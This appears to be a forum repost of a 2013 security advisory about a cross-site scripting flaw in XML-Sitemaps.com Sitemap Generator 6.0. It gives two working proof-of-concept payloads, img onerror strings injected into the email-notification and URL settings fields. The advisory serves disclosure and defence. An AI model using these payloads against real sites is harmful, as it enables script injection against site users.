Matt Posted July 2, 2013 Report Posted July 2, 2013 Description : XML-Sitemaps.com Sitemap Generator version 6.0 suffers from a cross site scripting vulnerability.Author : Christy Philip MathewSource : XML-Sitemaps.com Sitemap Generator 6.0 Cross Site Scripting ? Packet StormCode : # XML-Sitemaps.com Sitemap Generator# Date: 2nd July 2013# Author: Christy Philip Mathew (www.offcon.org)# Vendor or Software Link: http://www.xml-sitemaps.com/generator-demo/# Version : 6.0*XSS Vulnerability *(a) Configuration > Miscellaneous Settings > Send email notifications:Update the email to a@a.com"><img src=x onerror=prompt(0);>( Update the URL input box withhttp://site.com"><img src=x onerror=prompt(/XSS/);>Screenshot AttachedAll the Best*Christy Philip Mathew*Information Security ResearcherTwitter: @christypriory Quote